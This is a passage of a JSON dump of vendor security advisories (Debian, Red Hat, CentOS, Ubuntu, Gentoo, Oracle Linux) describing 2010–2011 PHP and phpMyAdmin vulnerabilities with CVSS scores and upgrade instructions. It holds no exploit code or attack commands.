fnmatch function can be abused to conduct denial of service attacks\n (by crashing the interpreter) by the means of a stack overflow.\n* [CVE-2010-2225](https://security-tracker.debian.org/tracker/CVE-2010-2225)\nThe SplObjectStorage unserializer allows attackers to execute arbitrary\n code via serialized data by the means of a use-after-free\n vulnerability.\n* [CVE-2010-3065](https://security-tracker.debian.org/tracker/CVE-2010-3065)\nThe default sessions serializer does not correctly handle a special\n marker, which allows an attacker to inject arbitrary variables into the\n session and possibly exploit vulnerabilities in the unserializer.\n* [CVE-2010-1128](https://security-tracker.debian.org/tracker/CVE-2010-1128)\nFor this vulnerability (predictable entropy for the Linear Congruential\n Generator used to generate session ids) we do not consider upstream's\n solution to be sufficient. It is recommended to uncomment the\n session.entropy\\_file and session.entropy\\_length settings in the php.ini\n files. Further improvements can be achieved by setting\n session.hash\\_function to 1 (one) and incrementing the value of\n session.entropy\\_length.\n\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 5.2.6.dfsg.1-1+lenny9.\n\n\nFor the testing distribution (squeeze) and the unstable distribution (sid),\nthese problems will be fixed soon.\n\n\nWe recommend that you upgrade your php5 packages.\n\n\n", "cvss3": {}, "published": "2010-08-06T00:00:00", "type": "osv", "title": "php5 - several vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2225", "CVE-2010-3065"], "modified": "2023-06-28T06:35:27", "id": "OSV:DSA-2089-1", "href": "https://osv.dev/vulnerability/DSA-2089-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-28T06:47:04", "description": "\nSeveral vulnerabilities were discovered in phpMyAdmin, a tool to\nadministrate MySQL over the web. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\n\n* [CVE-2011-2505](https://security-tracker.debian.org/tracker/CVE-2011-2505)\nPossible session manipulation in Swekey authentication.\n* [CVE-2011-2506](https://security-tracker.debian.org/tracker/CVE-2011-2506)\nPossible code injection in setup script, in case session\n variables are compromised.\n* [CVE-2011-2507](https://security-tracker.debian.org/tracker/CVE-2011-2507)\nRegular expression quoting issue in Synchronize code.\n* [CVE-2011-2508](https://security-tracker.debian.org/tracker/CVE-2011-2508)\nPossible directory traversal in MIME-type transformation.\n* [CVE-2011-2642](https://security-tracker.debian.org/tracker/CVE-2011-2642)\nCross site scripting in table Print view when the attacker can\n create crafted table names.\n* No CVE name yet\n\n Possible superglobal and local variables manipulation in\n Swekey authentication. (PMASA-2011-12)\n\n\nThe oldstable distribution (lenny) is only affected by \n[\\\nCVE-2011-2642](https://security-tracker.debian.org/tracker/CVE-2011-2642), which has been fixed in version 2.11.8.1-5+lenny9.\n\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 3.3.7-6.\n\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems have been fixed in version 3.4.3.2-1.\n\n\nWe recommend that you upgrade your phpmyadmin packages.\n\n\n", "cvss3": {}, "published": "2011-07-26T00:00:00", "type": "osv", "title": "phpymadmin - several", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508", "CVE-2011-2642"], "modified": "2023-06-28T06:46:56", "id": "OSV:DSA-2286-1", "href": "https://osv.dev/vulnerability/DSA-2286-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2023-12-02T12:46:11", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2286-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nJuly 26, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : phpymadmin\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-2505 CVE-2011-2506 CVE-2011-2507\n CVE-2011-2508 CVE-2011-2642\n\nSeveral vulnerabilities were discovered in phpMyAdmin, a tool to\nadministrate MySQL over the web. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2011-2505\n\n Possible session manipulation in Swekey authentication.\n\nCVE-2011-2506\n\n Possible code injection in setup script, in case session\n variables are compromised.\n\nCVE-2011-2507\n\n Regular expression quoting issue in Synchronize code.\n\nCVE-2011-2508\n\n Possible directory traversal in MIME-type transformation.\n\nCVE-2011-2642\n\n Cross site scripting in table Print view when the attacker can\n create crafted table names.\n\nNo CVE name yet\n\n Possible superglobal and local variables manipulation in\n Swekey authentication. (PMASA-2011-12)\n\nThe oldstable distribution (lenny) is only affected by CVE-2011-2642,\nwhich has been fixed in version 2.11.8.1-5+lenny9.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 3.3.7-6.\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems have been fixed in version 3.4.3.2-1.\n\nWe recommend that you upgrade your phpymadmin packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-07-26T19:11:55", "type": "debian", "title": "[SECURITY] [DSA 2286-1] phpmyadmin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508", "CVE-2011-2642"], "modified": "2011-07-26T19:11:55", "id": "DEBIAN:DSA-2286-1:4CCEC", "href": "https://lists.debian.org/debian-security-announce/2011/msg00160.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2021-10-21T04:45:27", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer. If a\nPHP script generated session variable names from untrusted user input, a\nremote attacker could use this flaw to inject an arbitrary variable into\nthe PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export() function\nimplementation. If some fatal error occurred during the execution of this\nfunction (such as the exhaustion of memory or script execution time limit),\npart of the function's output was sent to the user as script output,\npossibly leading to the disclosure of sensitive information.\n(CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in the\nway the PHP utf8_decode() function decoded partial multi-byte sequences\nfor some multi-byte encodings, sending them to output without them being\nescaped. An attacker could use these flaws to perform a cross-site\nscripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient\nentropy to seed the pseudo-random number generator. A remote attacker could\npossibly use this flaw to predict values returned by the function, which\nare used to generate session identifiers by default. This update changes\nthe function's implementation to use more entropy during seeding.\n(CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the\nlength of the pattern argument. A remote attacker could use this flaw to\ncrash the PHP interpreter where a script used fnmatch() on untrusted\nmatching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC\nextension. A malicious XML-RPC client or server could use this flaw to\ncrash the PHP interpreter via a specially-crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n", "cvss3": {}, "published": "2010-11-29T00:00:00", "type": "redhat", "title": "(RHSA-2010:0919) Moderate: php security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5016", "CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870"], "modified": "2017-09-08T08:17:21", "id": "RHSA-2010:0919", "href": "https://access.redhat.com/errata/RHSA-2010:0919", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:58", "description": "[5.1.6-27.3]\n- add security fix for CVE-2010-3870 (#626735)\n[5.1.6-27.2]\n- fix var_export test cases (#626735)\n[5.1.6-27.1]\n- add security fixes for CVE-2010-1917, CVE-2010-3065, CVE-2010-2531,\n CVE-2010-1128, CVE-2010-0397 (#626735)", "cvss3": {}, "published": "2010-11-29T00:00:00", "type": "oraclelinux", "title": "php security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870", "CVE-2009-5016", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2010-11-29T00:00:00", "id": "ELSA-2010-0919", "href": "http://linux.oracle.com/errata/ELSA-2010-0919.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2023-12-02T17:13:09", "description": "**CentOS Errata and Security Advisory** CESA-2010:0919\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer. If a\nPHP script generated session variable names from untrusted user input, a\nremote attacker could use this flaw to inject an arbitrary variable into\nthe PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export() function\nimplementation. If some fatal error occurred during the execution of this\nfunction (such as the exhaustion of memory or script execution time limit),\npart of the function's output was sent to the user as script output,\npossibly leading to the disclosure of sensitive information.\n(CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in the\nway the PHP utf8_decode() function decoded partial multi-byte sequences\nfor some multi-byte encodings, sending them to output without them being\nescaped. An attacker could use these flaws to perform a cross-site\nscripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient\nentropy to seed the pseudo-random number generator. A remote attacker could\npossibly use this flaw to predict values returned by the function, which\nare used to generate session identifiers by default. This update changes\nthe function's implementation to use more entropy during seeding.\n(CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the\nlength of the pattern argument. A remote attacker could use this flaw to\ncrash the PHP interpreter where a script used fnmatch() on untrusted\nmatching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC\nextension. A malicious XML-RPC client or server could use this flaw to\ncrash the PHP interpreter via a specially-crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2010-December/079367.html\nhttps://lists.centos.org/pipermail/centos-announce/2010-December/079368.html\nhttps://lists.centos.org/pipermail/centos-announce/2010-November/079359.html\nhttps://lists.centos.org/pipermail/centos-announce/2010-November/079360.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-cli\nphp-common\nphp-dba\nphp-devel\nphp-domxml\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pdo\nphp-pear\nphp-pgsql\nphp-snmp\nphp-soap\nphp-xml\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2010:0919", "cvss3": {}, "published": "2010-11-30T12:21:14", "type": "centos", "title": "php security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5016", "CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870"], "modified": "2010-12-01T22:08:34", "id": "CESA-2010:0919", "href": "https://lists.centos.org/pipermail/centos-announce/2010-November/079360.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2023-10-20T14:28:15", "description": "## Releases\n\n * Ubuntu 10.04 \n * Ubuntu 9.10 \n * Ubuntu 9.04 \n * Ubuntu 8.04 \n * Ubuntu 6.06 \n\n## Packages\n\n * php5 \\- \n\nAuke van Slooten discovered that PHP incorrectly handled certain xmlrpc \nrequests. An attacker could exploit this issue to cause the PHP server to \ncrash, resulting in a denial of service. This issue only affected Ubuntu \n6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-0397)\n\nIt was discovered that the pseudorandom number generator in PHP did not \nprovide the expected entropy. An attacker could exploit this issue to \npredict values that were intended to be random, such as session cookies. \nThis issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10. \n(CVE-2010-1128)\n\nIt was discovered that PHP did not properly handle directory pathnames that \nlacked a trailing slash character. An attacker could exploit this issue to \nbypass safe_mode restrictions. This issue only affected Ubuntu 6.06 LTS, \n8.04 LTS, 9.04 and 9.10. (CVE-2010-1129)\n\nGrzegorz Stachowiak discovered that the PHP session extension did not \nproperly handle semicolon characters. An attacker could exploit this issue \nto bypass safe_mode restrictions. This issue only affected Ubuntu 8.04 LTS, \n9.04 and 9.10. (CVE-2010-1130)\n\nStefan Esser discovered that PHP incorrectly decoded remote HTTP chunked \nencoding streams. An attacker could exploit this issue to cause the PHP \nserver to crash and possibly execute arbitrary code with application \nprivileges. This issue only affected Ubuntu 10.04 LTS. (CVE-2010-1866)\n\nMateusz Kocielski discovered that certain PHP SQLite functions incorrectly \nhandled empty SQL queries. An attacker could exploit this issue to possibly \nexecute arbitrary code with application privileges. (CVE-2010-1868)\n\nMateusz Kocielski discovered that PHP incorrectly handled certain arguments \nto the fnmatch function. An attacker could exploit this flaw and cause the \nPHP server to consume all available stack memory, resulting in a denial of \nservice. (CVE-2010-1917)\n\nStefan Esser discovered that PHP incorrectly handled certain strings in the \nphar extension. An attacker could exploit this flaw to possibly view \nsensitive information. This issue only affected Ubuntu 10.04 LTS. \n(CVE-2010-2094, CVE-2010-2950)\n\nStefan Esser discovered that PHP incorrectly handled deserialization of \nSPLObjectStorage objects. A remote attacker could exploit this issue to \nview sensitive information and possibly execute arbitrary code with \napplication privileges. This issue only affected Ubuntu 8.04 LTS, 9.04, \n9.10 and 10.04 LTS. (CVE-2010-2225)\n\nIt was discovered that PHP incorrectly filtered error messages when limits \nfor memory, execution time, or recursion were exceeded. A remote attacker \ncould exploit this issue to possibly view sensitive information. \n(CVE-2010-2531)\n\nStefan Esser discovered that the PHP session serializer incorrectly handled \nthe PS_UNDEF_MARKER marker. An attacker could exploit this issue to alter \narbitrary session variables. (CVE-2010-3065)\n", "cvss3": {}, "published": "2010-09-20T00:00:00", "type": "ubuntu", "title": "PHP vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1129", "CVE-2010-1130", "CVE-2010-1866", "CVE-2010-1868", "CVE-2010-1917", "CVE-2010-2094", "CVE-2010-2225", "CVE-2010-2531", "CVE-2010-2950", "CVE-2010-3065"], "modified": "2010-09-20T00:00:00", "id": "USN-989-1", "href": "https://ubuntu.com/security/notices/USN-989-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2023-12-02T21:07:29", "description": "### Background\n\nphpMyAdmin is a web-based management tool for MySQL databases. \n\n### Description\n\nMultiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers and phpMyAdmin Security Advisories referenced below for details. \n\n### Impact\n\nRemote attackers might be able to insert and execute PHP code, include and execute local PHP files, or perform Cross-Site Scripting (XSS) attacks via various vectors. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll phpMyAdmin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-3.4.9\"", "cvss3": {}, "published": "2012-01-04T00:00:00", "type": "gentoo", "title": "phpMyAdmin: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7251", "CVE-2008-7252", "CVE-2010-2958", "CVE-2010-3055", "CVE-2010-3056", "CVE-2010-3263", "CVE-2011-0986", "CVE-2011-0987", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508", "CVE-2011-2642", "CVE-2011-2643", "CVE-2011-2718", "CVE-2011-2719", "CVE-2011-3646", "CVE-2011-4064", "CVE-2011-4107", "CVE-2011-4634", "CVE-2011-4780", "CVE-2011-4782"], "modified": "2012-01-04T00:00:00", "id": "GLSA-201201-01", "href": "https://security.gentoo.org/glsa/201201-01", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-02T21:07:41", "description": "### Background\n\nPHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. \n\n### Description\n\nMultiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA context-dependent attacker could execute arbitrary code, obtain sensitive information from process memory, bypass intended access restrictions, or cause a Denial of Service in various ways. \n\nA remote attacker could cause a Denial of Service in various ways, bypass spam detections, or bypass open_basedir restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll PHP users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/php-5.3.8\"", "cvss3": {}, "published": "2011-10-10T00:00:00", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-7243", "CVE-2009-5016", "CVE-2010-1128", "CVE-2010-1129", "CVE-2010-1130", "CVE-2010-1860", "CVE-2010-1861", "CVE-2010-1862", "CVE-2010-1864", "CVE-2010-1866", "CVE-2010-1868", "CVE-2010-1914", "CVE-2010-1915", "CVE-2010-1917", "CVE-2010-2093", "CVE-2010-2094", "CVE-2010-2097", "CVE-2010-2100", "CVE-2010-2101", "CVE-2010-2190", "CVE-2010-2191", "CVE-2010-2225", "CVE-2010-2484", "CVE-2010-2531", "CVE-2010-2950", "CVE-2010-3062", "CVE-2010-3063", "CVE-2010-3064", "CVE-2010-3065", "CVE-2010-3436", "CVE-2010-3709", "CVE-2010-3710", "CVE-2010-3870", "CVE-2010-4150", "CVE-2010-4409", "CVE-2010-4645", "CVE-2010-4697", "CVE-2010-4698", "CVE-2010-4699", "CVE-2010-4700", "CVE-2011-0420", "CVE-2011-0421", "CVE-2011-0708", "CVE-2011-0752", "CVE-2011-0753", "CVE-2011-0755", "CVE-2011-1092", "CVE-2011-1148", "CVE-2011-1153", "CVE-2011-1464", "CVE-2011-1466", "CVE-2011-1467", "CVE-2011-1468", "CVE-2011-1469", "CVE-2011-1470", "CVE-2011-1471", "CVE-2011-1657", "CVE-2011-1938", "CVE-2011-2202", "CVE-2011-2483", "CVE-2011-3182", "CVE-2011-3189", "CVE-2011-3267", "CVE-2011-3268"], "modified": "2011-10-10T00:00:00", "id": "GLSA-201110-06", "href": "https://security.gentoo.org/glsa/201110-06", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Web Application Security : PHP SuperGlobal Variables are vulnerable to Hackers

Description

Related